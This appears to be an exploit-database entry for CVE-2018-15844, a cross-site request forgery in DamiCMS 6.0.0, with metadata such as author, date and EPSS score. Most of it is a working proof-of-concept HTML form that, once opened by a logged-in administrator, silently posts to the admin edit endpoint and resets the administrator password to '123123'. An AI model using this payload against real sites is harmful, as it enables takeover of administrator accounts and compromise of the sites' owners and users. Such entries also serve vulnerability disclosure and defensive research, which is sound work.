Lucene search

K
exploitpackAutism_JHEXPLOITPACK:63B8CA2DDE3CCBA6E0181E988A178AFA
HistoryAug 31, 2018 - 12:00 a.m.

DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)

2018-08-3100:00:00
Autism_JH
14

EPSS

0.001

Percentile

46.9%

DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)

# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
# After the administrator login in,open the poc,the administrator account's 
# password will been changed to 123123

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
			<input type="hidden" name="username" value="admin" />
			<input type="hidden" name="password" value="123123" />
			<input type="hidden" name="role&#95;id" value="1" />
			<input type="hidden" name="id" value="1" />
			<input type="hidden" name="Submit" value="รง&#161;&#174;รฅ&#174;&#154;รค&#191;&#174;รฆ&#148;&#185;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

EPSS

0.001

Percentile

46.9%

Related for EXPLOITPACK:63B8CA2DDE3CCBA6E0181E988A178AFA